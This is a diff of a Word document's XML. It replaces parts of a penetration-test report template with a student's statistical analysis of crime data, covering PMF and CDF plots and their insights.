+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc59959351"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>PFM and CDF</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="4"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t>The student will be required to fill out this penetration testing report fully and to include the following sections:</w:t>
-      </w:r>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Pmf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Cdf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> are classes that represent probability mass functions (PMFs) and cumulative distribution functions (CDFs), respectively.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="17"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>A PMF is a function that gives the probability of each possible value of a discrete random variable.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="17"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>A CDF is a function that gives the probability that a random variable will take on a value less than or equal to a given value</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Before getting the PMF and CDF information, its </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>importante</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to prepare the dataset.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  To improve the clarity and visualization of the data, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>it’s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> important to add a new reference column that identifies each Type of Offence</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7109AA25" wp14:editId="1FB6D949">
+            <wp:extent cx="4764741" cy="2127275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
+            <wp:docPr id="1132297921" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1132297921" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4775233" cy="2131959"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The best approach to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>visualize</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the PMF is plotting a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> wide </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">bar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>chart.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2365DA41" wp14:editId="480F6905">
+            <wp:extent cx="5576047" cy="2523490"/>
+            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
+            <wp:docPr id="86401753" name="Picture 1" descr="A graph of a number of blue bars&#10;&#10;Description automatically generated with medium confidence"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="86401753" name="Picture 1" descr="A graph of a number of blue bars&#10;&#10;Description automatically generated with medium confidence"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5584097" cy="2527133"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">To get the exact values, we can also explore the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>pmi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> itself</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, here are a way to explore the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>pmi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79155D04" wp14:editId="2A71CDB5">
+            <wp:extent cx="6120130" cy="2632710"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2065384188" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2065384188" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6120130" cy="2632710"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Insights from this PFM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>The most common crime type is 67 "Theft and related offences", with a probability over 0.14.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>The least common crime type is 34, "Infanticide", with probability of 2.08e-07 or 0.000000208</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>The distribution of crime types is skewed, with a few crime types accounting for a large proportion of the total number of crimes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Exploring CDF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>A CDF is a function that gives the probability that a random variable will take on a value less than or equal to a given value.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="234B2849" wp14:editId="0517E364">
+            <wp:extent cx="6120130" cy="4027805"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1624026734" name="Picture 1" descr="A graph of data on a white background&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1624026734" name="Picture 1" descr="A graph of data on a white background&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6120130" cy="4027805"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Insights from the CDF:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The CDF chart shows that the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>VALUE</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> column is skewed to the right. This means that there are more values in the dataset that are greater than the median value than there are values that are less than the median value. The median value of the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>VALUE</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> column is approximately 10,000.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The CDF chart also shows that there are a small number of outliers in the dataset. Outliers are values that are much larger or smaller than the rest of the values in the dataset. The outliers in the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>VALUE</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> column are greater than 15,000.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7516,7 +9279,7 @@
           <w:u w:color="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc59959350"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc59959352"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
@@ -7526,7 +9289,8 @@
           <w:u w:color="000000"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">2.0 </w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">3.0 </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -7560,9 +9324,9 @@
           <w:color w:val="000000"/>
           <w:u w:color="000000"/>
         </w:rPr>
-        <w:t>– High-Level Summary</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="4"/>
+        <w:t>– Methodologies</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="5"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7577,307 +9341,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t xml:space="preserve">John Doe was tasked with performing an internal penetration test towards Offensive Security Labs. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>similar to</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> those of a hacker and attempt to infiltrate Offensive Security’s internal lab systems – the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-        </w:rPr>
-        <w:t>THINC.local</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t>domain</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
